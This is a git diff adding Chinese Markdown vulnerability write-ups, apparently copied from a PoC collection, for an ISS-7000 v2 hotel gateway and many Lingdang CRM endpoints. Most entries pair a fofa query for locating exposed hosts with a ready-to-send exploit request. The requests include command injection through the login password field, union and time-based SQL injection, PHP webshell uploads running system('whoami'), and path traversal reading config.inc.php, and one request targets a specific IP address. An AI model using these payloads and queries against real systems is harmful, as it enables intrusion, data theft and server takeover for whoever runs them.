+![1722533721568-8ccae965-cf23-41b8-9b0f-087e222a1df4.png](./img/S161PTrhLGIcPwyy/1722533721568-8ccae965-cf23-41b8-9b0f-087e222a1df4-867868.png)
+
+# 四、漏洞复现
+```java
+GET /yuding/selectUserByOrgId.action?record= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Connection: close
+```
+
+![1722533694097-958173f0-a710-4928-98ef-cf3474338592.png](./img/S161PTrhLGIcPwyy/1722533694097-958173f0-a710-4928-98ef-cf3474338592-016901.png)
+
+
+
+> 更新: 2024-08-12 17:15:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ikk2p8bp66933w1b>
\ No newline at end of file
diff --git a/瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md b/瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md
new file mode 100644
index 0000000..1fb1b4a
--- /dev/null
+++ b/瀚霖科技股份有限公司ISS-7000v2网关login_handler.cgi存在命令执行漏洞.md
@@ -0,0 +1,31 @@
+# 瀚霖科技股份有限公司ISS-7000 v2网关login_handler.cgi存在命令执行漏洞
+
+# 一、漏洞简介
+ ISS-7000 v2网络网关服务器是台高性能的网关，提供各类酒店网络认证计费的完整解决方案。由于智慧手机与平板电脑日渐普及，人们工作之时开始使用随身携带的设备，因此无线网络也成为网络使用者基本服务的项目。ISS-7000 v2可登录300至1000终端设备同时上网，并发量是一般设备的好几倍。为了提供安全上网服务，本公司专利技术所设计的动态使用者帐户生成器，能避免非使用者侵入酒店内部网络。
+
+# 二、影响版本
+1.00.06 和1.00.08
+
+# 三、资产测绘
+    - fofa `<font style="color:rgb(221, 17, 68);">body="css/login_form_style-06.css"</font>`
++ 特征
+
+![1731053389608-53172b55-f85a-4160-90a1-a46437c9e921.png](./img/2eQP4LJ8jemsjq4j/1731053389608-53172b55-f85a-4160-90a1-a46437c9e921-708438.png)
+
+# 四 、漏洞复现
+```java
+POST /login_handler.cgi HTTP/1.1
+Host: 
+Content-Length: 79
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin=
+```
+
+![1731053435815-51591c43-d512-4214-a447-edfb19d54653.png](./img/2eQP4LJ8jemsjq4j/1731053435815-51591c43-d512-4214-a447-edfb19d54653-365176.png)
+
+
+
+> 更新: 2024-11-27 10:04:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zburq1ug9szxzm22>
\ No newline at end of file
diff --git a/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md b/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
new file mode 100644
index 0000000..29f1ce6
--- /dev/null
+++ b/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞
+
+灵当CRM系统接口getMyAmbassador存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+logincrm_userid=-1 union select user(),2,3#
+```
+
+![image-20241227212430930](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272124007.png)
\ No newline at end of file
diff --git a/灵当CRM系统接口getOrderList存在SQL注入漏洞.md b/灵当CRM系统接口getOrderList存在SQL注入漏洞.md
new file mode 100644
index 0000000..2b007bc
--- /dev/null
+++ b/灵当CRM系统接口getOrderList存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 灵当CRM系统接口getOrderList存在SQL注入漏洞
+
+灵当CRM系统接口getOrderList存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240919111854302](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191119991.png)
\ No newline at end of file
diff --git a/灵当CRM系统接口multipleUpload.php文件上传漏洞.md b/灵当CRM系统接口multipleUpload.php文件上传漏洞.md
new file mode 100644
index 0000000..38f0aa5
--- /dev/null
+++ b/灵当CRM系统接口multipleUpload.php文件上传漏洞.md
@@ -0,0 +1,29 @@
+# 灵当CRM系统接口multipleUpload.php文件上传漏洞
+
+灵当CRM系统接口multipleUpload.php文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
+
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/png
+
+<?php system("whoami");unlink(__FILE__);?>
+------WebKitFormBoundaryj7OlOPiiukkdktZR--
+```
+
+![image-20240923093829498](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409230938562.png)
+
+文件路径`/crm/storage/2024/September/week2/1.php`
\ No newline at end of file
diff --git a/灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md b/灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md
new file mode 100644
index 0000000..946b166
--- /dev/null
+++ b/灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞.md
@@ -0,0 +1,24 @@
+# 灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞
+
+灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞，允许攻击者通过恶意读取系统配置文件，获取敏感信息。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+GET /crm/data/pdf.php?url=../config.inc.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Connection: Keep-Alive
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181607841.webp)
\ No newline at end of file
diff --git a/灵当CRM系统接口uploadfile文件上传漏洞.md b/灵当CRM系统接口uploadfile文件上传漏洞.md
new file mode 100644
index 0000000..c88ac2a
--- /dev/null
+++ b/灵当CRM系统接口uploadfile文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 灵当CRM系统接口uploadfile文件上传漏洞
+
+灵当CRM系统接口uploadfile文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+file_info={"name":"1.php"}&<?php system("whoami");unlink(__FILE__);?>
+```
+
+![image-20241227212839673](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272128744.png)
+
+文件路径
+
+```
+/crm/storage/2024/December/week4/回显文件名.php
+```
+
diff --git a/灵当CRM系统接口wechatSession文件上传漏洞.md b/灵当CRM系统接口wechatSession文件上传漏洞.md
new file mode 100644
index 0000000..ded2584
--- /dev/null
+++ b/灵当CRM系统接口wechatSession文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 灵当CRM系统接口wechatSession文件上传漏洞
+
+灵当CRM系统接口wechatSession文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy
+
+------WebKitFormBoundary03rNBzFMIytvpWhy
+Content-Disposition: form-data; name="file"; filename="2.php"
+Content-Type: image/jpeg
+
+<?php system("whoami");unlink(__FILE__);?>
+------WebKitFormBoundary03rNBzFMIytvpWhy--
+```
+
+![image-20241018155224218](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181552292.png)
+
+文件路径`/crm/storage/wechatsession/2024/10/14/2.php`
\ No newline at end of file
diff --git a/灵当crmauth-info存在信息泄露漏洞.md b/灵当crmauth-info存在信息泄露漏洞.md
new file mode 100644
index 0000000..677c511
--- /dev/null
+++ b/灵当crmauth-info存在信息泄露漏洞.md
@@ -0,0 +1,31 @@
+# 灵当crm auth-info 存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当CRM客户管理系统auth-info 存在信息泄露漏洞。</font>
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` `<font style="color:rgb(51, 51, 51);">body="crmcommon/js/jquery/jquery-1.10.1.min.js"</font>`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/cG69q8kjl5ea6aqq/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-284399.png)
+
+# 四、漏洞复现
+```java
+POST /crm/dataCache/weixin/auth_info.txt HTTP/1.1
+Host: 
+Content-Length: 779
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+```
+
+![1726734061269-8f9d8451-18ae-477b-b392-9d4db0f4ecc5.png](./img/cG69q8kjl5ea6aqq/1726734061269-8f9d8451-18ae-477b-b392-9d4db0f4ecc5-484618.png)
+
+
+
+
+
+> 更新: 2024-10-21 11:49:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iayn7tuulf8b68rg>
\ No newline at end of file
diff --git a/灵当crmgetOrderList存在SQL注入漏洞.md b/灵当crmgetOrderList存在SQL注入漏洞.md
new file mode 100644
index 0000000..3e12c11
--- /dev/null
+++ b/灵当crmgetOrderList存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 灵当crm getOrderList存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当CRM客户管理系getOrderList存在SQL注入漏洞。</font>
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` `<font style="color:rgb(51, 51, 51);">body="crmcommon/js/jquery/jquery-1.10.1.min.js"</font>`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/HIaLS568Ua4tqtpX/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-553408.png)
+
+# 四、漏洞复现
+```java
+GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=11%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(1)))fiAG) HTTP/1.1
+Host: 120.79.185.144:85
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![1726734714363-2bcde573-1379-4233-b74e-f18ee0a65373.png](./img/HIaLS568Ua4tqtpX/1726734714363-2bcde573-1379-4233-b74e-f18ee0a65373-855630.png)
+
+```java
+GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![1726734781470-32269f52-de00-4e64-b137-09ff307ffdb3.png](./img/HIaLS568Ua4tqtpX/1726734781470-32269f52-de00-4e64-b137-09ff307ffdb3-547283.png)
+
+
+
+> 更新: 2024-10-21 11:49:38  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kuce46edah7b3gg3>
\ No newline at end of file
diff --git a/灵当crmmultipleUpload存在任意文件上传漏洞.md b/灵当crmmultipleUpload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..975dc1d
--- /dev/null
+++ b/灵当crmmultipleUpload存在任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 灵当crm multipleUpload存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当crm multipleUpload.php处存在任意文件上传漏洞。</font>
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/n_rB39my7VHUQaTD/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-180620.png)
+
+# 四、漏洞复现
+```java
+POST /crm/modules/Home/multipleUpload.php?uploadtype=uploadimg HTTP/1.1
+Host: 
+Content-Length: 779
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokh
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+
+------WebKitFormBoundary0Mh3BfgWszxRFokh
+Content-Disposition: form-data; name="file"; filename="budong.php"
+Content-Type: text/plain
+
+<?phpinfo();?>
+------WebKitFormBoundary0Mh3BfgWszxRFokh
+Content-Disposition: form-data; name="error"
+
+UPLOAD_ERR_OK
+------WebKitFormBoundary0Mh3BfgWszxRFokh--
+```
+
+![1726733803836-2941958f-c112-40e2-a412-85a7277323f6.png](./img/n_rB39my7VHUQaTD/1726733803836-2941958f-c112-40e2-a412-85a7277323f6-953406.png)
+
+上传路径
+
+```java
+crm/storage/2024/September/week3/budong.php
+```
+
+![1726733845670-f34ac442-40c8-4647-af5c-c0cab59d4d83.png](./img/n_rB39my7VHUQaTD/1726733845670-f34ac442-40c8-4647-af5c-c0cab59d4d83-617707.png)
+
+
+
+> 更新: 2024-10-21 11:49:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nlhbtvcu71urmozp>
\ No newline at end of file
diff --git a/灵当crmpdf存在任意文件读取漏洞.md b/灵当crmpdf存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8743d48
--- /dev/null
+++ b/灵当crmpdf存在任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# 灵当crm pdf存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当crm pdf存在任意文件读取漏洞。</font>
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"` `<font style="color:rgb(51, 51, 51);">body="crmcommon/js/jquery/jquery-1.10.1.min.js"</font>`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/uNV9YIwNHkg-_q-Y/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-880986.png)
+
+# 四、漏洞复现
+```plain
+POST /crm/data/pdf.php?url=../config.inc.php HTTP/1.1
+Host: 
+Content-Length: 2
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+```
+
+![1728882377030-f7b89190-737c-4a4b-8097-45564458f641.png](./img/uNV9YIwNHkg-_q-Y/1728882377030-f7b89190-737c-4a4b-8097-45564458f641-707988.png)
+
+
+
+> 更新: 2024-10-21 11:49:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lbbo0kaxgwsh554t>
\ No newline at end of file
diff --git a/灵当crmuploadfile存在文件写入漏洞.md b/灵当crmuploadfile存在文件写入漏洞.md
new file mode 100644
index 0000000..4b62831
--- /dev/null
+++ b/灵当crmuploadfile存在文件写入漏洞.md
@@ -0,0 +1,42 @@
+# 灵当crm uploadfile存在文件写入漏洞
+
+# 一、漏洞简介
+灵当CRM 是一款企业级客户关系管理软件。它旨在帮助企业管理客户信息、销售流程、市场营销活动和客户服务等。灵当crm存在任意文件写入漏洞，攻击者可以通过该漏洞写入恶意文件获取服务器权限。
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/zbtgoiC2mvDmPJa-/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-405288.png)
+
+# 四、漏洞复现
+```plain
+POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 67
+
+file_info={"name":"1.php"}&<?php echo(md5(233));unlink(__FILE__);?>
+```
+
+![1722999883677-c325fb74-5f58-4e4e-814f-8ea774b13e7f.png](./img/zbtgoiC2mvDmPJa-/1722999883677-c325fb74-5f58-4e4e-814f-8ea774b13e7f-699951.png)
+
+```plain
+/crm/storage/2024/August/week1/172299960228103.php
+```
+
+![1722999942783-ec8ba7e2-6600-4657-8fea-321871ee93a1.png](./img/zbtgoiC2mvDmPJa-/1722999942783-ec8ba7e2-6600-4657-8fea-321871ee93a1-443569.png)
+
+
+
+> 更新: 2024-10-21 11:49:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oaxy831ru4asisru>
\ No newline at end of file
diff --git a/灵当crmuploadify存在任意文件上传漏洞.md b/灵当crmuploadify存在任意文件上传漏洞.md
new file mode 100644
index 0000000..353fbeb
--- /dev/null
+++ b/灵当crmuploadify存在任意文件上传漏洞.md
@@ -0,0 +1,54 @@
+# 灵当crm uploadify存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当crm uploadify存在任意文件上传漏洞。</font>
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/89rFkHy0Jze9KFbC/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-481570.png)
+
+# 四、漏洞复现
+```java
+POST /crm/uploaddify/uploadify.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Length: 10338
+
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="Filedata"; filename="1.php"
+Content-Type: images/cat_icon
+
+<?php phpinfo();?>
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="myatt_moduel"
+
+1
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="myatt_id";
+
+1
+-----------------------------45250802924973458471174811279
+```
+
+![1725194375782-5456a1c1-b949-4db3-ba8f-a06824257440.png](./img/89rFkHy0Jze9KFbC/1725194375782-5456a1c1-b949-4db3-ba8f-a06824257440-425903.png)
+
+上传路径
+
+```java
+/crm/storage/1/1/1.php
+```
+
+![1725194400326-59fd1c75-9f0b-4a2f-bfea-a6064b740ba7.png](./img/89rFkHy0Jze9KFbC/1725194400326-59fd1c75-9f0b-4a2f-bfea-a6064b740ba7-647080.png)
+
+
+
+> 更新: 2024-10-21 11:49:38  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/khc5fd9mcxhktk2y>
\ No newline at end of file
diff --git a/灵当crmupload存在任意文件上传漏洞.md b/灵当crmupload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..cb75874
--- /dev/null
+++ b/灵当crmupload存在任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 灵当crm upload存在任意文件上传漏洞
+
+# 一、漏洞简介
+灵当CRM 是一款企业级客户关系管理软件。它旨在帮助企业管理客户信息、销售流程、市场营销活动和客户服务等。灵当crm存在任意文件上传漏洞，攻击者可以通过该漏洞写入恶意文件获取服务器权限。
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/j8nQmcKhk10d4pW9/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-980852.png)
+
+# 四、漏洞复现
+```plain
+POST /crm/upload.php HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=----234561
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Length: 149
+
+------234561
+Content-Disposition: form-data; name="file"; filename="aa.php"
+Content-Type: application/octet-stream
+
+234561
+------234561--
+```
+
+![1724488643826-3811d571-231f-4716-afa1-4b1ccc1f1146.png](./img/j8nQmcKhk10d4pW9/1724488643826-3811d571-231f-4716-afa1-4b1ccc1f1146-899092.png)
+
+```plain
+/crm/recordData/20240824/aa.php
+其中20240824为当前时间
+```
+
+![1724488682774-49825d41-a6b0-4d3b-9280-1734b8fa1b04.png](./img/j8nQmcKhk10d4pW9/1724488682774-49825d41-a6b0-4d3b-9280-1734b8fa1b04-648240.png)
+
+
+
+> 更新: 2024-10-21 11:49:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ilggltsrlmmqkw8h>
\ No newline at end of file
diff --git a/灵当crmwechatSession存在任意文件上传漏洞.md b/灵当crmwechatSession存在任意文件上传漏洞.md
new file mode 100644
index 0000000..1cae987
--- /dev/null
+++ b/灵当crmwechatSession存在任意文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 灵当crm wechatSession存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当crm wechatSession存在任意文件上传漏洞。</font>
+
+# 二、影响版本
++ 灵当crm
+
+# 三、资产测绘
++ fofa`body="[http://localhost:8088/crm/index.php"](http://localhost:8088/crm/index.php") && body="ldcrm.base.js"`
++ 特征
+
+![1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a.png](./img/_w2Gyv2xSYRBrMgJ/1722999861305-1e9e41ad-ed6a-4750-918d-61a0631ad06a-091281.png)
+
+# 四、漏洞复现
+```plain
+POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Length: 10338
+
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+-----------------------------45250802924973458471174811279
+```
+
+![1728882630940-32cf6935-cb61-43f2-bb84-4062e86a1fea.png](./img/_w2Gyv2xSYRBrMgJ/1728882630940-32cf6935-cb61-43f2-bb84-4062e86a1fea-574633.png)
+
+```plain
+/crm//storage//wechatsession//2024//10//14//1.php
+```
+
